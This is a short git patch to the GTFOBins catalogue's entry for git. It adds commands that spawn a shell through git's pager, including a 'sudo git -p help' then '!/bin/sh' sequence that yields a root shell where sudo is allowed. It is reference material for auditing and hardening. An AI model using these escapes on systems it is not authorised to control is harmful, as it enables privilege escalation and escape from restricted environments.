From 08f5b33651a6b7c61988e8693cbd84d780b0bd70 Mon Sep 17 00:00:00 2001 From: Emilio Date: Sun, 31 Mar 2019 11:03:34 +0100 Subject: [PATCH] Add functions with default pager in git --- _gtfobins/git.md | 8 ++++++++ 1 file changed, 8 insertions(+) diff --git a/_gtfobins/git.md b/_gtfobins/git.md index e9769ac..2e9f889 100644 --- a/_gtfobins/git.md +++ b/_gtfobins/git.md @@ -2,8 +2,16 @@ functions: shell: - code: PAGER='sh -c "exec sh 0<&1"' git -p help + - description: This invokes the default pager, which is likely to be [`less`](/gtfobins/less/), other functions may apply. + code: | + git -p help + !/bin/sh sudo: - code: PAGER='sh -c "exec sh 0<&1"' sudo -E git -p help + - description: This invokes the default pager, which is likely to be [`less`](/gtfobins/less/), other functions may apply. + code: | + sudo git -p help + !/bin/sh limited-suid: - code: PAGER='sh -c "exec sh 0<&1"' ./git -p help ---